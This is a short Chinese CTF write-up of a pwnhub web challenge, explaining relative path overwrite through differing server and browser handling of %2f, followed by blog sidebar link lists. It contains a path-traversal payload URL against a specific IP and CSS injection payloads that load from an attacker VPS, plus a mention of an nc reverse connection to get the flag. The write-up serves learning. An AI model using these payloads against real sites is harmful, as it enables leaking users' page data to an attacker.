这个pwnhub小m师傅的题,做的时候完全没有思路。

首先是注册然后可以看到一个加载css的地方,是相对路径加载(当然我并没有觉得有什么问题)。

服务端和浏览器解析URL是有区别的,就是%2f

服务器吧%2f解析成/ 比如:http://domain/1%2f2.php,我们访问这个,服务器会解析成http://domain/1/2.php,而浏览器会把1%2f2.php当成一个文件

知道这点过后我们来看看payload:http://52.80.19.55/user.php/510/a/b/..%2f..%2f..%2f..%2fclasses.php

服务器把%2f当成/所以就变成了http://52.80.19.55/user.php/510/a/b/../../../../classes.php网上跳4级目录就是/classes.php

而浏览器把这个..%2f..%2f..%2f..%2fclasses.php当成一个目录,在加载这个目录下面的css的时候就变成了http://52.80.19.55/user.php/510/a/b/..%2f..%2f..%2f..%2fclasses.php../../classes.css网上跳两级目录就成了在user.php下面加载css而这个css里面的<p>写入了页面就是用户注册时提交的viow

,提交时提交自己的vps:*{}*{background-image:url('http://vpsip');}*{}或者{}import url('http://vpsip')

然后通过bugreporter 提交payload nc反弹就可以得到flag;

第一次遇到这个东西所以想记录下来

最新文章

  1. 你知道C#中的Lambda表达式的演化过程吗?
  2. Spring框架总结
  3. BaseServlet
  4. Redis几个认识误区(转)
  5. oracle 字段上下两条记录的相减
  6. MonkeyRunner于Windows在下面Eclipse开发环境的搭建步骤(并解决在线Jython配置错误的问题)
  7. delphi edit编辑框使用
  8. 手机自动化测试:appium源码分析之bootstrap五
  9. SQL 2005/2008 连接SQL 2000报18456错误
  10. JDBC原理
  11. Linux 第十二天
  12. 万恶之源 - Python生成器
  13. PAT 甲级 1022 Digital Library
  14. Crystal Report Error: Either the Crystal Reports registy key permission are insufficient or the Crystal Reports runtime is not installed correctly
  15. android 百度地图 No implementation found for int
  16. 用VSTS进行网站压力测试
  17. 深入理解 iOS Rendering Process
  18. Android中开发需要的高效助推的命令总结
  19. 微信小程序新版用户授权方式处理
  20. SVM之核函数

热门文章

  1. SVN版本控制中.a无法提交问题
  2. MotionEvent分析及ImageView缩放实现
  3. java中String.valueOf(obj)、(String)obj与obj.toString()有什么区别
  4. 转载的C#学习笔记
  5. UVA 11752 The Super Powers —— 数学与幂
  6. Codeforces Round #105 (Div. 2) E. Porcelain —— DP(背包问题)
  7. CSU - 1530 Gold Rush —— 二进制
  8. BZOJ 1620 [Usaco2008 Nov]Time Management 时间管理:贪心
  9. 【CQ18高一暑假前挑战赛5】标程
  10. OpenCV在Zedboard上的移植